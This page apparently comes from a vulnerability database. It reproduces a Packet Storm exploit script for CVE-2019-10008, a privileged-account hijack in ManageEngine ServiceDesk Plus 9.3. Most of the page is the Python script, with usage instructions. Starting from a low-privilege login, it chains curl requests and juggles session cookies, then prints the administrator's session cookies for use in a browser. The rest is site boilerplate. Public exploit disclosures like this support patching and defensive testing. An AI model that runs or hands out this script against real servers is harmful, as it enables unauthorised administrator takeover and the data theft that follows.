Lucene search
+L

Manage Engine ServiceDesk Plus 9.3 Privilege Escalation

🗓️ 04 Apr 2019 00:00:00Reported by Ata HakcilType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

Manage Engine ServiceDesk Plus 9.3 Privilege Escalation exploit for account hijacking on Windows 10 64 bi

Code
`#!/usr/bin/python  
  
# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking  
# Date: 30-03-2019  
# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız  
# Vendor: ManageEngine  
# Vendor Homepage: www.manageengine.com  
# Product: Service Desk Plus  
# Version: 9.3  
# Tested On: Windows 10 64 bit  
# CVE : 2019-10008  
  
  
# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.  
# Low username and password is an account you have access to. high_username is account you want to authenticate as.  
  
# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.  
# Run this script on a Linux OS.  
  
#Host ip address + port  
host="localhost:8080"  
  
#set to https if needed  
url = "http://" + host  
  
#Username with credentials you have  
low_username="guest"  
low_password="guest"  
  
#username you want to login as  
high_username="administrator"  
  
  
  
  
  
print("\033[1;37mUrl: \033[1;32m" + url)  
print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)  
print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)  
  
  
print("\033[1;32mGetting a session id\033[1;37m")  
  
# Get index page to capture a session id  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\  
$'"+url+"/'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
  
print("Sessid:")  
print(sessid)  
  
  
print("\033[1;31mLogging in with low privilege user\033[1;37m")  
  
  
#Attempt login post request   
curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\  
-H $'Referer: "+url+"/'\  
-H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \  
-b $'JSESSIONID="+sessid+"' \  
--data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\  
hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\  
dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \  
$'"+url+"/j_security_check'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
  
#Instead of following redirects with -L, following manually because we don't need all the transactions.  
curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\  
-H $'Referer: "+url+"/'\  
-H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \  
-b $'JSESSIONID="+sessid+"' \  
$'"+url+"/'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
print("\033[1;32mCaptured authenticated cookies.\033[1;37m")  
sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
print(sessid)  
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]  
print(sessidsso)  
grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)  
  
grbl2 = []  
for cookie in grbl:  
cl = cookie.split('=')  
if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':  
  
grbl2.append(cl[0])  
grbl2.append(cl[1])  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/'"  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
  
print("\033[1;32mCaptured secondary sessid.\033[1;37m")  
print(sessid2)  
  
  
print("\033[1;31mDoing the magic step 1.\033[1;37m")  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Referer: "+url+"/mc/WOListView.do' \  
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/jsp/MCLogOut.jsp'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
print("\033[1;31mDoing the magic step 2.\033[1;37m")  
  
  
  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/jsp/MCDashboard.jsp'"  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]  
  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/'"  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
  
  
curl = "curl -i -s -k -X $'POST' \  
-H $'"+host+"' \  
-H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \  
-H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
--data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \  
$'"+url+"/mc/j_security_check'"  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
curl = "curl -i -s -k -X $'GET' \  
-H $'Host: "+host+"' \  
-H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \  
-H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
-H $'Upgrade-Insecure-Requests: 1' \  
-b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \  
$'"+url+"/mc/jsp/MCDashboard.jsp'"  
  
  
  
out = os.popen('/bin/bash -c "' + curl+'"').read()  
  
  
sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]  
sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]  
  
print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")  
print("JSESSIONID=" + sessidhigh)  
print("JSESSIONIDSSO=" + sessidssohigh)  
print(grbl2[0] + "=" + grbl2[1])  
print(grbl2[2] + "=" + grbl2[3])  
print("_rem=true")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
36